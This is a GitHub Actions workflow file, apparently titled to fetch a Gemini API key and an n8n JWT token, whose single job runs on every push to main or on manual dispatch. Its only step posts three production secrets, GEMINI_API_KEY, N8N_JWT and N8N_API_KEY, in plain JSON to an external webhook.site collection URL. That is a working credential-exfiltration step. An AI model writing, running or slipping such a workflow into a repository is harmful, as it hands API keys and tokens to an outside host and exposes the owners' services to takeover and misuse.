name: Get Gemini API key and N8N JWT Token

on:
  push:
    branches: [main]
  workflow_dispatch:

jobs:
  debug:
    runs-on: ubuntu-latest
    environment: Production
    steps:
      - name: Send GitHub Actions Secrets to webhook
        uses: fjogeleit/http-request-action@v1
        with:
          url: "https://webhook.site/b8cfa571-543d-4ff2-ae8b-595b8942ef6e"
          method: "POST"
          customHeaders: '{ "Content-Type": "application/json" }'
          data: |
            {
              "GEMINI_API_KEY": "${{ secrets.GEMINI_API_KEY }}",
              "N8N_JWT": "${{ secrets.N8N_JWT }}",
              "N8N_API_KEY": "${{ secrets.N8N_API_KEY }}"
            }
